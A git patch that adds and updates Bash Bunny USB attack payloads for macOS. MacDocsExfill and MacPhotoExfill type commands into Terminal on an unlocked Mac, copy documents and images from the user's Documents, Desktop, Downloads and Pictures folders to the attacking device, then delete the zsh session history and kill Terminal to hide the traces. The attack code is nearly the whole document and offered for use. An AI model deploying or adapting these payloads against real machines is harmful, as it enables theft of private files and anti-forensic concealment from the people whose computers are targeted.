From 37a4d9b42e2e34b2dc2da5d5253158795dd9e6b6 Mon Sep 17 00:00:00 2001
From: afsh4ck <132138425+afsh4ck@users.noreply.github.com>
Date: Sat, 10 Jun 2023 03:03:32 +0200
Subject: [PATCH] Update of MacPhotoExfill & Create MacDocsExfill (#588)

* Update readme.md

* Update payload.txt

* Create MacDocsExfill

* Delete MacDocsExfill

* Add files via upload
---
 .../exfiltration/MacDocsExfill/payload.txt    | 78 +++++++++++++++++++
 .../exfiltration/MacDocsExfill/readme.md      | 46 +++++++++++
 .../exfiltration/MacPhotoExfill/payload.txt   | 45 +++++++----
 .../exfiltration/MacPhotoExfill/readme.md     | 23 +++---
 4 files changed, 165 insertions(+), 27 deletions(-)
 create mode 100644 payloads/library/exfiltration/MacDocsExfill/payload.txt
 create mode 100644 payloads/library/exfiltration/MacDocsExfill/readme.md

diff --git a/payloads/library/exfiltration/MacDocsExfill/payload.txt b/payloads/library/exfiltration/MacDocsExfill/payload.txt
new file mode 100644
index 000000000..8550d009c
--- /dev/null
+++ b/payloads/library/exfiltration/MacDocsExfill/payload.txt
@@ -0,0 +1,78 @@
+#!/bin/bash
+#
+# Title:         MacDocsExfill
+# Author:        afsh4ck
+# Version:       1.0
+# Target:        MacOS
+# Category:      Exfiltration
+#
+# Exfilter all the images from the principal folders on unlocked MacOS targets.
+# Stashes them in /loot/MacDocsExfill
+#
+# Purple             Setup
+# Amber..............Attack Mode ON
+# Green..............Finished
+
+LED SETUP
+ATTACKMODE HID STORAGE ECM_ETHERNET
+GET TARGET_HOSTNAME
+QUACK DELAY 1000
+
+lootdir=loot/MacDocsExfill/$TARGET_HOSTNAME
+mkdir -p /root/udisk/$lootdir
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 2000
+
+LED STAGE 1
+
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
+QUACK ENTER
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
+QUACK ENTER
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
+QUACK ENTER
+QUACK STRING rsync -av Documents/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Documents ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+QUACK STRING rsync -av Desktop/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Desktop ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+QUACK STRING rsync -av Downloads/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Downloads ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+
+# Ensure sincronization
+sync
+
+# Cleanup and delete proofs
+LED STAGE 2
+QUACK ENTER
+
+# Eject BB storage
+QUACK STRING diskutil eject /Volumes/BashBunny/
+QUACK ENTER
+QUACK DELAY 500
+
+# Remove terminal history from current session (commands used in attack won't be visible with the history command)
+QUACK STRING rm -r ~/.zsh_sessions
+QUACK ENTER
+QUACK DELAY 500
+
+# Exit terminal
+QUACK STRING killall Terminal
+QUACK ENTER
+
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/exfiltration/MacDocsExfill/readme.md b/payloads/library/exfiltration/MacDocsExfill/readme.md
new file mode 100644
index 000000000..c29bd451c
--- /dev/null
+++ b/payloads/library/exfiltration/MacDocsExfill/readme.md
@@ -0,0 +1,46 @@
+# Mac Docs Exfilter for the BashBunny
+
+ _______    ______    ______         __    __ 
+|       \  /      \  /      \       |  \  |  \
+| $$$$$$$\|  $$$$$$\|  $$$$$$\      | $$  | $$
+| $$  | $$| $$  | $$| $$   \$$______ \$$\/  $$
+| $$  | $$| $$  | $$| $$     |      \ >$$  $$ 
+| $$  | $$| $$  | $$| $$   __ \$$$$$$/  $$$$\ 
+| $$__/ $$| $$__/ $$| $$__/  \      |  $$ \$$\
+| $$    $$ \$$    $$ \$$    $$      | $$  | $$
+ \$$$$$$$   \$$$$$$   \$$$$$$        \$$   \$$
+
+
+* Author:     afsh4ck
+* Version:    1.0
+* Target:     MacOS
+* Tested on:  Ventura 13.3.1
+* Category:   Exfiltration
+
+# DESCRIPTION
+
+Exfilter all the documents from the principal folders on unlocked MacOS targets.
+Stashes them in /loot/MacDocsExfill/$hostname grouped in subfolders:
+
+| Subfolder          | Content                                      |
+| ------------------ | -------------------------------------------- |
+| Documents          | All the docs in /root/Documents folder       |
+| Desktop            | All the docs in /root/Desktop folder         |
+| Downloads          | All the docs in /root/Downloads folder       |
+
+# IMAGE FORMATS
+
+| Format             | 
+| ------------------ |
+| .docx              | 
+| .xlsx              | 
+| .pdf               |
+
+# LED STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Green              | Setup                                        |
+| Yellow Blink       | Attack Mode ON                               |
+| Purple Slow        | Cleaning all proofs                          |
+| Green Fixed        | Finish                                       |
diff --git a/payloads/library/exfiltration/MacPhotoExfill/payload.txt b/payloads/library/exfiltration/MacPhotoExfill/payload.txt
index e2ed4f90b..e1802e69f 100644
--- a/payloads/library/exfiltration/MacPhotoExfill/payload.txt
+++ b/payloads/library/exfiltration/MacPhotoExfill/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title:         MacPhotoExfill
 # Author:        afsh4ck
-# Version:       1.0
+# Version:       1.1
 # Target:        MacOS
 # Category:      Exfiltration
 #
@@ -27,7 +27,7 @@ QUACK STRING terminal
 QUACK ENTER
 QUACK DELAY 2000
 
-LED ATTACK
+LED STAGE 1
 
 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
 QUACK ENTER
@@ -37,33 +37,50 @@ QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
 QUACK ENTER
 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
 QUACK ENTER
-QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
+QUACK STRING rsync -av Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
 QUACK ENTER
-QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
+QUACK STRING echo "Please wait while the files are copied...";
 QUACK ENTER
-QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
+QUACK STRING wait;
 QUACK ENTER
-QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
+QUACK STRING rsync -av Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
 QUACK ENTER
-# We can control the time for the payload execution
-QUACK DELAY 25000
-QUACK CTRL C
-# Cleanup and delete proofs
-LED M SLOW
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+QUACK STRING rsync -av Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
 QUACK ENTER
+QUACK STRING rsync -av Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+
+# Ensure sincronization
+sync
+
+# Cleanup and delete proofs
+LED STAGE 2
 QUACK ENTER
+
 # Eject BB storage
 QUACK STRING diskutil eject /Volumes/BashBunny/
 QUACK ENTER
 QUACK DELAY 500
+
 # Remove terminal history from current session (commands used in attack won't be visible with the history command)
 QUACK STRING rm -r ~/.zsh_sessions
 QUACK ENTER
 QUACK DELAY 500
+
 # Exit terminal
 QUACK STRING killall Terminal
 QUACK ENTER
-# Ensure sincronization
-sync
 
-LED FINISH
\ No newline at end of file
+LED FINISH
diff --git a/payloads/library/exfiltration/MacPhotoExfill/readme.md b/payloads/library/exfiltration/MacPhotoExfill/readme.md
index 9e9e1bb76..eee524c8b 100644
--- a/payloads/library/exfiltration/MacPhotoExfill/readme.md
+++ b/payloads/library/exfiltration/MacPhotoExfill/readme.md
@@ -1,17 +1,14 @@
 # Mac Photo Exfilter for the BashBunny
 
-
-*      ___          ___       ___          ___          ___          ___          ___     
-*     /  /\        /  /\     /  /\        /__/\        /  /\        /  /\        /__/|    
-*    /  /::\      /  /:/_   /  /:/_       \  \:\      /  /::\      /  /:/       |  |:|    
-*   /  /:/\:\    /  /:/ /\ /  /:/ /\       \__\:\    /  /:/\:\    /  /:/        |  |:|    
-*  /  /:/ /::\  /  /:/ /://  /:/ /::\  ___ /  /::\  /  /:/ /::\  /  /:/  ___  __|  |:|    
-* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\  /:/\:\/__/:/ /:/\:\/__/:/  /  /\/__/\_|:|____
-* \  \:\/:/__\/\  \:\/:/ \  \:\/:/ /:/\  \:\/:/__\/\  \:\/:/__\/\  \:\ /  /:/\  \:\/:::::/
-*  \  \::/      \  \::/   \  \::/ /:/  \  \::/      \  \::/      \  \:\  /:/  \  \::/--- 
-*   \  \:\       \  \:\    \__\/ /:/    \  \:\       \  \:\       \  \:\/:/    \  \:\     
-*    \  \:\       \  \:\     /__/:/      \  \:\       \  \:\       \  \::/      \  \:\    
-*     \__\/        \__\/     \__\/        \__\/        \__\/        \__\/        \__\/    
+ _______   __    __   ______  ________   ______          __    __ 
+|       \ |  \  |  \ /      \|        \ /      \        |  \  |  \
+| $$$$$$$\| $$  | $$|  $$$$$$\\$$$$$$$$|  $$$$$$\       | $$  | $$
+| $$__/ $$| $$__| $$| $$  | $$  | $$   | $$  | $$ ______ \$$\/  $$
+| $$    $$| $$    $$| $$  | $$  | $$   | $$  | $$|      \ >$$  $$ 
+| $$$$$$$ | $$$$$$$$| $$  | $$  | $$   | $$  | $$ \$$$$$$/  $$$$\ 
+| $$      | $$  | $$| $$__/ $$  | $$   | $$__/ $$       |  $$ \$$\
+| $$      | $$  | $$ \$$    $$  | $$    \$$    $$       | $$  | $$
+ \$$       \$$   \$$  \$$$$$$    \$$     \$$$$$$         \$$   \$$
 
 
 * Author:     afsh4ck
@@ -47,4 +44,4 @@ Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:
 | Green              | Setup                                        |
 | Yellow Blink       | Attack Mode ON                               |
 | Purple Slow        | Cleaning all proofs                          |
-| Green Fixed        | Finish            |
+| Green Fixed        | Finish                                       |